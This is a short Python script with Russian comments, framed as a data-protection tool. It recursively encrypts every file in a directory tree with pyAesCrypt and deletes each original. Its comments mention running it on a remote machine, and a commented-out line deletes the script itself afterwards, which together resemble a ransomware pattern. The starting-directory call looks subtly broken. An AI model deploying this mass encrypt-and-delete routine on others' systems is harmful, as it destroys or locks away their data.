#программа по шифрованию файлов и директорий.
# Польза от шифрования в целом достаточно большая. В совренном мире шифровка данных,
# является актуальной. Существует множество опасностей для потери данных.
# Пусть это будет взлом, или потеря телефона. Кража личных архивов фото или номеров телефона,
# кредитных карт или др. интеллектуальных проектов. Для осуществления данного кода понадобиться
# библиотека AesCrypt.
import pyAesCrypt # для шифровки файлов
import os   # ходит по директориям и ищет файлы
# Если шифровка файлов происходит на удалённой машине, то необходимо удалить за собой скрипты
# import sys
# функция шифрования файла
def encryption(file, password):

    # задаём рамер буфера
    buffer_size = 512 * 1024

    # вызываем метод шифрования
    pyAesCrypt.encryptFile(
        str(file),
        str(file) + ".crp",
        password,
        buffer_size
    )

    # чтобы видеть результат вывожу на печать имя зашифрованного файла
    print("[Файл '" + str(os.path.splitext(file)[0]) + "' зашифрован]")
    # удаляю исходный файл с помощью функции remove
    os.remove(file)

# функция сканирования директорий
def walking_by_dirs(dir, password):

    # перебираю все поддиректории в указанной директории
    for name in os.listdir(dir):
        path = os.path.join(dir, name)

        # если находим файл, то шифруем его
        if os.path.isfile(path):
            try:
                encryption(path, password)
            except Exception as ex:
                print(ex)
        # если находим директории, то повторяем цикл в поисках файлов
        else:
            walking_by_dirs(path, password)

password = input("Введите пароль для шифрования: ")
walking_by_dirs("", password)
# os.remove(str(sys.argv[0])) # для удаления скриптов на удалённом компьютере
# при этом необходимо сохранить свои файлы перед началом работы,
# иначе они будут безвозвратно удалены